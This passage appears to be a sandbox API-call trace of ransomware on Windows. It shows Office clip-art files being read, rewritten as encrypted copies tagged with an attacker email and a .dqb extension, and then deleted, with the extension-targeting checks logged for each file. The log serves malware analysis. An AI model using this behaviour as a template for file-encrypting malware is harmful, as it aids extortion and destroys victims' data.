lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x504a, lpOverlapped=0x0) returned 1 [0053.705] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x5050, lpOverlapped=0x0) returned 1 [0053.706] ReadFile (in: hFile=0x230, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.706] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.706] SetEndOfFile (hFile=0x208) returned 1 [0053.818] CloseHandle (hObject=0x208) returned 1 [0053.819] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.819] SetEndOfFile (hFile=0x230) returned 1 [0053.820] CloseHandle (hObject=0x230) returned 1 [0053.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.820] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0054.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0054.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0054.389] lstrlenW (lpString=".doc") returned 4 [0054.389] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.389] lstrlenW (lpString=".docx") returned 5 [0054.389] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.389] lstrlenW (lpString=".pdf") returned 4 [0054.389] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.389] lstrlenW (lpString=".xls") returned 4 [0054.389] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.389] lstrlenW (lpString=".xlsx") returned 5 [0054.389] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.389] lstrlenW (lpString=".ppt") returned 4 [0054.389] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0054.389] lstrlenW (lpString=".zip") returned 4 [0054.389] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.389] lstrlenW (lpString=".rar") returned 4 [0054.389] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.390] lstrlenW (lpString=".bz2") returned 4 [0054.390] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.390] lstrlenW (lpString=".7z") returned 3 [0054.390] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0054.390] lstrlenW (lpString=".dbf") returned 4 [0054.390] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0054.390] lstrlenW (lpString=".1cd") returned 4 [0054.390] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0054.390] lstrlenW (lpString=".jpg") returned 4 [0054.390] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.006] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.006] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0055.186] GetLastError () returned 0x0 [0055.186] ReadFile (in: hFile=0x200, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x1eb6, lpOverlapped=0x0) returned 1 [0055.376] WriteFile (in: hFile=0x234, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1ec0, lpOverlapped=0x0) returned 1 [0055.377] ReadFile (in: hFile=0x200, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.377] WriteFile (in: hFile=0x234, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.377] SetEndOfFile (hFile=0x234) returned 1 [0055.377] CloseHandle (hObject=0x234) returned 1 [0055.377] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.377] SetEndOfFile (hFile=0x200) returned 1 [0055.378] CloseHandle (hObject=0x200) returned 1 [0055.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf")) returned 1 [0055.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0055.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0055.379] lstrlenW (lpString=".doc") returned 4 [0055.379] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString=".docx") returned 5 [0055.379] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.379] lstrlenW (lpString=".pdf") returned 4 [0055.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString=".xls") returned 4 [0055.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.379] lstrlenW (lpString=".xlsx") returned 5 [0055.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.379] lstrlenW (lpString=".ppt") returned 4 [0055.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0055.379] lstrlenW (lpString=".zip") returned 4 [0055.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.379] lstrlenW (lpString=".rar") returned 4 [0055.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString=".bz2") returned 4 [0055.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString=".7z") returned 3 [0055.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0055.379] lstrlenW (lpString=".dbf") returned 4 [0055.379] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0055.379] lstrlenW (lpString=".1cd") returned 4 [0055.379] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0055.379] lstrlenW (lpString=".jpg") returned 4 [0055.379] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.524] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.524] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.525] GetLastError () returned 0x0 [0055.525] ReadFile (in: hFile=0x240, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6c8, lpOverlapped=0x0) returned 1 [0055.534] WriteFile (in: hFile=0x214, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0055.535] ReadFile (in: hFile=0x240, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.535] WriteFile (in: hFile=0x214, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.535] SetEndOfFile (hFile=0x214) returned 1 [0055.535] CloseHandle (hObject=0x214) returned 1 [0055.535] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.535] SetEndOfFile (hFile=0x240) returned 1 [0055.536] CloseHandle (hObject=0x240) returned 1 [0055.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.536] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf")) returned 1 [0055.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0055.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0055.537] lstrlenW (lpString=".doc") returned 4 [0055.537] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString=".docx") returned 5 [0055.537] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.537] lstrlenW (lpString=".pdf") returned 4 [0055.537] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString=".xls") returned 4 [0055.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.537] lstrlenW (lpString=".xlsx") returned 5 [0055.537] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.537] lstrlenW (lpString=".ppt") returned 4 [0055.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0055.537] lstrlenW (lpString=".zip") returned 4 [0055.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.537] lstrlenW (lpString=".rar") returned 4 [0055.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString=".bz2") returned 4 [0055.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString=".7z") returned 3 [0055.537] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0055.537] lstrlenW (lpString=".dbf") returned 4 [0055.537] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0055.537] lstrlenW (lpString=".1cd") returned 4 [0055.537] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0055.537] lstrlenW (lpString=".jpg") returned 4 [0055.537] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.538] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.538] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.538] GetLastError () returned 0x0 [0055.538] ReadFile (in: hFile=0x240, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6ba0, lpOverlapped=0x0) returned 1 [0055.552] WriteFile (in: hFile=0x214, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6bb0, lpOverlapped=0x0) returned 1 [0055.553] ReadFile (in: hFile=0x240, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.553] WriteFile (in: hFile=0x214, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.553] SetEndOfFile (hFile=0x214) returned 1 [0055.553] CloseHandle (hObject=0x214) returned 1 [0055.553] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.554] SetEndOfFile (hFile=0x240) returned 1 [0055.554] CloseHandle (hObject=0x240) returned 1 [0055.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.555] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 1 [0055.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0055.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0055.615] lstrlenW (lpString=".doc") returned 4 [0055.615] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.615] lstrlenW (lpString=".docx") returned 5 [0055.615] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.615] lstrlenW (lpString=".pdf") returned 4 [0055.615] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.615] lstrlenW (lpString=".xls") returned 4 [0055.615] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.615] lstrlenW (lpString=".xlsx") returned 5 [0055.615] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.615] lstrlenW (lpString=".ppt") returned 4 [0055.615] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0055.615] lstrlenW (lpString=".zip") returned 4 [0055.615] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.615] lstrlenW (lpString=".rar") returned 4 [0055.615] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.615] lstrlenW (lpString=".bz2") returned 4 [0055.615] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.615] lstrlenW (lpString=".7z") returned 3 [0055.615] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0055.616] lstrlenW (lpString=".dbf") returned 4 [0055.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0055.616] lstrlenW (lpString=".1cd") returned 4 [0055.616] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0055.616] lstrlenW (lpString=".jpg") returned 4 [0055.616] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.616] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.616] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.616] GetLastError () returned 0x0 [0055.616] ReadFile (in: hFile=0x23c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x414, lpOverlapped=0x0) returned 1 [0055.622] WriteFile (in: hFile=0x238, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x420, lpOverlapped=0x0) returned 1 [0055.623] ReadFile (in: hFile=0x23c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.623] WriteFile (in: hFile=0x238, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.623] SetEndOfFile (hFile=0x238) returned 1 [0055.623] CloseHandle (hObject=0x238) returned 1 [0055.623] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.623] SetEndOfFile (hFile=0x23c) returned 1 [0055.624] CloseHandle (hObject=0x23c) returned 1 [0055.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.624] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0055.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0055.624] lstrlenW (lpString=".doc") returned 4 [0055.624] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.624] lstrlenW (lpString=".docx") returned 5 [0055.624] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.624] lstrlenW (lpString=".pdf") returned 4 [0055.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.625] lstrlenW (lpString=".xls") returned 4 [0055.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.625] lstrlenW (lpString=".xlsx") returned 5 [0055.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.625] lstrlenW (lpString=".ppt") returned 4 [0055.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0055.625] lstrlenW (lpString=".zip") returned 4 [0055.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.625] lstrlenW (lpString=".rar") returned 4 [0055.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.625] lstrlenW (lpString=".bz2") returned 4 [0055.625] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.625] lstrlenW (lpString=".7z") returned 3 [0055.625] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0055.625] lstrlenW (lpString=".dbf") returned 4 [0055.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0055.625] lstrlenW (lpString=".1cd") returned 4 [0055.625] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0055.625] lstrlenW (lpString=".jpg") returned 4 [0055.625] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.625] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.626] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.626] GetLastError () returned 0x0 [0055.626] ReadFile (in: hFile=0x23c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x876, lpOverlapped=0x0) returned 1 [0055.627] WriteFile (in: hFile=0x238, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x880, lpOverlapped=0x0) returned 1 [0055.630] ReadFile (in: hFile=0x23c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.631] WriteFile (in: hFile=0x238, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.631] SetEndOfFile (hFile=0x238) returned 1 [0055.631] CloseHandle (hObject=0x238) returned 1 [0055.631] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.631] SetEndOfFile (hFile=0x23c) returned 1 [0055.632] CloseHandle (hObject=0x23c) returned 1 [0055.632] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.632] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 1 [0055.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0055.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0055.632] lstrlenW (lpString=".doc") returned 4 [0055.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.632] lstrlenW (lpString=".docx") returned 5 [0055.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.632] lstrlenW (lpString=".pdf") returned 4 